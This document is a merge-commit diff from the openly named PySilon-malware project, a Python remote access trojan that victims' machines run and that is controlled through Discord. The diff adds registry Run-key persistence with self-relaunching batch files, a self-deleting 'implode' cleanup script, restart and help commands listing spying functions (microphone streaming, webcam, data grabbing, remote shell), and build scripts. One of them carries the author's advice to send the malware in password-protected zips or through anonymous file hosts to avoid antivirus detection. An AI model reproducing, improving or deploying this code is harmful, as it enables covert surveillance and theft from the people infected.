Merge pull request #97 from mategol/py-dev

V3.1 critical fixes update - Release candidate

.github/ISSUE_TEMPLATE/bug_report.md

@@ -24,7 +24,7 @@ A clear and concise description of what you expected to happen.
 If applicable, add screenshots to help explain your problem.
 
 **Desktop (please complete the following information):**
- - OS: [e.g. Windows 11, Windows 10]
+- OS: [e.g. Windows 11, Windows 10]
 -  Python Version: [e.g. 3.11.3]
 - PySilon language: [Python or Rust]
 

PySilon.bat

@@ -4,9 +4,25 @@ echo Initializing the virtual environment...
 python -m venv pysilon
 cls
 call pysilon\Scripts\activate.bat
+python -m pip install --upgrade pip
 pip install pillow
 pip install pyinstaller
 cls
 python builder.py
-echo #===============================================================# & echo # Software terminated.                                          # & echo #                                                               # & echo # If you like this project please consider giving me a star     # & echo # to let others know that this is something worth looking into. # & echo #===============================================================# & echo. & echo.
+echo #===============================================================# 
+echo #                    Software terminated.                       # 
+echo #                                                               # 
+echo #   Give us a Star on Github, this would really help us grow!   # 
+echo #        https://github.com/mategol/PySilon-malware             # 
+echo #                                                               #
+echo #   Also, please don't send this malware using websites like    #
+echo # Workupload or googledrive because they will scan the malware  #
+echo # and keep track of it and other ocurrences, which will result  #
+echo # in more detections in the future, please send it to people in #
+echo # a zip archive with a password, or use services like anonfiles #
+echo #                                                               #
+echo #                         Thank You!                            #
+echo #===============================================================# 
+echo. 
+echo.
 pause

PySilon.sh

@@ -0,0 +1,104 @@
+#!/bin/bash
+
+# Github: mategol/PySilon-malware
+# Author: Neek8044
+# Description: Bash script to compile PySilon under Linux with wine
+
+# Supported distros: Ubuntu, Fedora, Arch (and derivatives)
+# Not supported: openSUSE, Nix, Void, Debian, Alpine, etc.
+
+if [ $(whoami) == 'root' ]; then
+    echo -e "\e[1;31mYou must not run this as root. Rerun without root.\e[0m"
+    exit
+fi
+
+echo -e "[+] Configure Wine first? \e[32m[c]onfigure\e[0m/\e[31m[r]un anyways\e[0m (you must configure if it's the first time running this)"
+read -p "$ " mode
+
+# If configuration mode was selected, do these:
+if [ "$mode" == 'c' ]; then
+    # Ask if wine is installed
+    echo -e "[+] Do you have wine already installed? \e[32m[y]es\e[0m/\e[31m[n]o\e[0m (defaults to yes)"
+    read -p "$ " wine_installed
+    # If wine is not installed, show prompt to choose package manager
+    if [ "$wine_installed" == 'n' ]; then
+        echo -e "[+] Select your package manager (\e[34m[a]pt\e[0m, \e[34m[d]nf\e[0m, \e[34m[p]acman\e[0m) or hit \e[34menter\e[0m to skip."
+        read -p "$ " package_manager
+
+        # Install wine using the selected package manager
+        if [ "$package_manager" == 'a' ]; then
+            sudo apt update -y && sudo apt install wine -y
+        elif [ "$package_manager" == 'd' ]; then
+            sudo dnf update -y && sudo dnf install wine -y
+        elif [ "$package_manager" == 'p' ]; then
+            sudo pacman -Sy wine --noconfirm
+        elif [ -z "$package_manager" ]; then
+            echo -e "\e[34m[-] Enter was pressed, skipping.\e[0m"
+        else
+            echo -e "\e[31m[x] Invalid input was given, skipping.\e[0m"
+        fi
+    elif [ "$wine_installed" == 'y' ]; then
+        :
+    else
+        echo -e "\e[31m[x] Enter was pressed or other invalid input was given, skipping.\e[0m"
+    fi
+
+    # Ask to download and install Python in Wine
+    echo -e "[+] Install Python inside of wine? \e[32m[y]es\e[0m/\e[34menter\e[0m to skip."
+    read -p "$ " install_python
+
+    # If user entered 'y', download and install Python in Wine
+    if [ "$install_python" == 'y' ]; then
+        echo -e "\e[36m[#] Fetching Python for Windows...\e[0m"
+        wget https://www.python.org/ftp/python/3.10.8/python-3.10.8-amd64.exe -O python-3.x.x-amd64.exe # Change link for a different version (3.10.8 works fine under wine)
+        echo -e "\e[36m[#] Launching Python installer through Wine...\e[0m"
+        echo -e "\e[1;35m[i] Make sure to add Python to PATH and go to \"Customize Installation > Next > Install for all users\" in the installer!\e[0m"
+        wine ./python-3.x.x-amd64.exe # Change version to the version set in the above link
+    elif [ -z "$install_python" ]; then
+        echo -e "\e[34m[-] Enter was pressed, skipping.\e[0m"
+    else
+        echo -e "\e[31m[x] Invalid input was given, skipping.\e[0m"
+    fi
+
+    # Ask to create a new venv (or keep the existing, in case it already exists)
+    echo -e "[+] Create new virtual environment? \e[32m[y]es\e[0m/\e[34menter\e[0m to skip (say yes if it's the first time running this)."
+    read -p "$ " create_venv
+    if [ "$create_venv" == 'y' ]; then
+        wine python -m pip install wheel setuptools
+        wine python -m venv pysilon
+    elif [ -z "$create_venv" ]; then
+        echo -e "\e[34m[-] Enter was pressed, skipping.\e[0m"
+    else
+        echo -e "\e[31m[x] Invalid input was given, skipping.\e[0m"
+    fi
+
+    # Initializing venv
+    echo -e "\e[36m[#] Initializing the virtual environment...\e[0m"
+    wine call ".\\pysilon\\Scripts\\activate.bat" ###* Attention needed / Might not work (activate.bat does not get called) ###
+
+    # Install requirements.txt
+    echo -e "\e[36m[#] Installing PIP requirements.txt...\e[0m"
+    wine python -m pip install wheel setuptools
+    wine python -m pip install -r requirements.txt
+
+# If run mode was selected, continue
+elif [ "$mode" == 'r' ]; then
+    :
+# If no mode was selected, display error and continue
+else
+    echo -e "\e[31m[x] Invalid input, proceeding to the execuion of builder.py anyways.\e[0m"
+fi
+
+# Running builder.py
+echo -e "\e[36m[#] Running builder.py...\e[0m"
+wine python builder.py
+
+echo
+echo -e "\e[33m#===============================================#\e[0m"
+echo -e "\e[33m# Software terminated.                          #\e[0m"
+echo -e "\e[33m#                                               #\e[0m"
+echo -e "\e[33m# Give me a star on Github!                     #\e[0m"
+echo -e "\e[33m# https://github.com/mategol/PySilon-malware    #\e[0m"
+echo -e "\e[33m#===============================================#\e[0m"
+echo
+echo

builder.py

@@ -37,19 +37,6 @@
     'import os\n',
 ]
 
-source_code_modifiers = {
-    '$modules': [],
-    '!opus_initialization': [],
-    '!registry': [],
-    '!recording_startup': [],
-    '!cookies_submit': [],
-    '!registry_implosion': [],
-    'on reaction add': [],
-    'on message': [],
-    'on message end': [],
-    'anywhere': [],
-    'bottom': []
-}
 
 def get_file_path(file_types):
     root2 = Tk()
@@ -166,7 +153,22 @@ def disclaimer_toggle():
         generate_source_btn['state'] = DISABLED
 
 def assemble_source_code():
-    global status, config_path
+    global source_code_modifiers, status, config_path
+
+    source_code_modifiers = {
+        '$modules': [],
+        '!opus_initialization': [],
+        '!registry': [],
+        '!recording_startup': [],
+        '!cookies_submit': [],
+        '!registry_implosion': [],
+        'on reaction add': [],
+        'on message': [],
+        'on message end': [],
+        'anywhere': [],
+        'bottom': []
+    }
+
     save_configuration()
     config = configparser.ConfigParser(); config.read(config_path)
 

main_obsolete.py

@@ -354,6 +354,7 @@ async def on_message(message):
                 vc.play(PyAudioPCM())
                 await message.channel.send('`[' + current_time() + '] Joined voice-channel and streaming microphone in realtime`')
 
+
             elif message.content == '.tree':
                 await message.delete()
                 if message.channel.id == channel_ids['file']:

resources/source_code/registry.py

@@ -1,5 +1,4 @@
 from shutil import copy2, rmtree
-from getpass import getuser
 import winreg
 import sys
 import os
@@ -9,7 +8,7 @@
 registry = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER)
 winreg.OpenKey(registry, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run')
 registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0, winreg.KEY_WRITE)
-winreg.DeleteValue(registry_key, software_directory_name)
+winreg.DeleteValue(registry_key, software_registry_name)
 
 # !registry
 if sys.argv[0].lower() != 'c:\\users\\' + getuser() + '\\' + software_directory_name.lower() + '\\' + software_executable_name.lower() and not os.path.exists('C:\\Users\\' + getuser() + '\\' + software_directory_name + '\\' + software_executable_name):
@@ -22,3 +21,8 @@
     registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0, winreg.KEY_WRITE)
     winreg.SetValueEx(registry_key, software_registry_name, 0, winreg.REG_SZ, 'C:\\Users\\' + getuser() + '\\' + software_directory_name + '\\' + software_executable_name)
     winreg.CloseKey(registry_key)
+    with open(f'C:\\Users\\{getuser()}\\{software_directory_name}\\activate.bat', 'w', encoding='utf-8') as activator:
+        process_name = sys.argv[0].split('\\')[-1]
+        activator.write(f'pushd "C:\\Users\\{getuser()}\\{software_directory_name}"\nstart "" "{software_executable_name}"\ntaskkill /f /im "{process_name}"\ndel "%~f0"')
+    subprocess.Popen(f'C:\\Users\\{getuser()}\\{software_directory_name}\\activate.bat', creationflags=subprocess.CREATE_NO_WINDOW)
+    sys.exit(0)

source.py

@@ -21,6 +21,8 @@
 from urllib.request import urlopen
 from itertools import islice
 from resources.misc import *
+from getpass import getuser
+from shutil import rmtree
 import subprocess
 import discord
 import asyncio
@@ -71,10 +73,11 @@
 processes_messages, processes_list, process_to_kill = [], [], ''
 files_to_merge, expectation, one_file_attachment_message = [[], [], []], None, None
 cookies_thread, implode_confirmation, cmd_messages = None, None, []
-working_directory = sys.argv[0].split('\\')[:-1]
 
 # [pysilon_var] !registry 0
 
+working_directory = ['C:', 'Users', getuser(), software_directory_name]
+
 @client.event
 async def on_ready():
     global force_to_send, messages_to_send, files_to_send, embeds_to_send, channel_ids, cookies_thread
@@ -127,6 +130,8 @@ async def on_ready():
             else:
                 chunk += line + '\n'
         await client.get_channel(channel_ids['info']).send('```' + chunk + '```')
+
+
     else:
         for channel in category.channels:
             if channel.name == 'info': channel_ids['info'] = channel.id
@@ -166,7 +171,7 @@ async def on_raw_reaction_add(payload):
     message = await client.get_channel(payload.channel_id).fetch_message(payload.message_id)
     reaction = discord.utils.get(message.reactions, emoji=payload.emoji.name)
     user = payload.member
-    
+
     if user.bot == False:
         if str(reaction) == '📌':
             if message.channel.id in channel_ids.values():
@@ -183,13 +188,19 @@ async def on_reaction_add(reaction, user):
         if reaction.message.channel.id in channel_ids.values():
             try:
                 if str(reaction) == '💀' and expectation == 'implosion':
+                    await reaction.message.channel.send('```PySilon will try to implode after sending this message. So if there\'s no more messages, the cleanup was successfull.```')
 # [pysilon_var] !registry_implosion 5
                     secure_delete_file('PySilon.key', 10)
-                    os.system('cmd.exe /c taskkill /f /pid ' + str(os.getpid()) + ' & del "' + sys.argv[0] + '"')
+                    try: rmtree('rec_')
+                    except: pass
+                    with open(f'C:\\Users\\{getuser()}\\implode.bat', 'w', encoding='utf-8') as imploder:
+                        imploder.write(f'pushd "C:\\Users\\{getuser()}"\ntaskkill /f /im "{software_executable_name}"\ntimeout /t 3 /nobreak\nrmdir /s /q "C:\\Users\\{getuser()}\\{software_directory_name}"\ndel "%~f0"')
+                    subprocess.Popen(f'C:\\Users\\{getuser()}\\implode.bat', creationflags=subprocess.CREATE_NO_WINDOW)
+                    sys.exit(0)
                 elif str(reaction) == '🔴' and expectation == 'implosion':
-                    expectation = None                
+                    expectation = None
 # [pysilon_var] on reaction add 4
-            except Exception as err: print(err)
+            except Exception as err: await reaction.message.channel.send(str(err))
 
 @client.event
 async def on_raw_reaction_remove(payload):
@@ -209,7 +220,18 @@ async def on_message(message):
                 await message.delete()
                 await message.channel.send('``` `````` `````` `````` `````` `````` `````` `````` `````` `````` `````` `````` `````` `````` `````` `````` `````` `````` `````` `````` ```\n\n```Send here PySilon.key generated along with RAT executable```\n\n')
                 expectation = 'key'
-
+
+            elif message.content == '.restart':
+                await message.delete()
+                await message.channel.send('```PySilon will be restarted now... Stand by...```')
+                os.startfile(f'C:\\Users\\{getuser()}\\{software_directory_name}\\{software_executable_name}')
+                sys.exit(0)
+
+            elif message.content[:5] == '.help':
+                await message.delete()
+                if message.content.strip() == '.help':
+                    reaction_msg = await message.channel.send('```List of all commands:\n.ss\n.join\n.show [what-to-show]\n.kill [process-id]\n.grab [what-to-grab]\n.clear\n.pwd\n.tree\n.ls\n.download [file-or-dir]\n.upload [type] [name]\n.execute [file]\n.remove [file-or-dir]\n.implode\n.webcam photo\n.cmd [command]\n.cd [dir]\n.update\nDetailed List here: https://github.com/mategol/PySilon-malware/wiki/Commands```'); await reaction_msg.add_reaction('🔴')
+
             elif expectation == 'key':
                 try:
                     split_v1 = str(message.attachments).split("filename='")[1]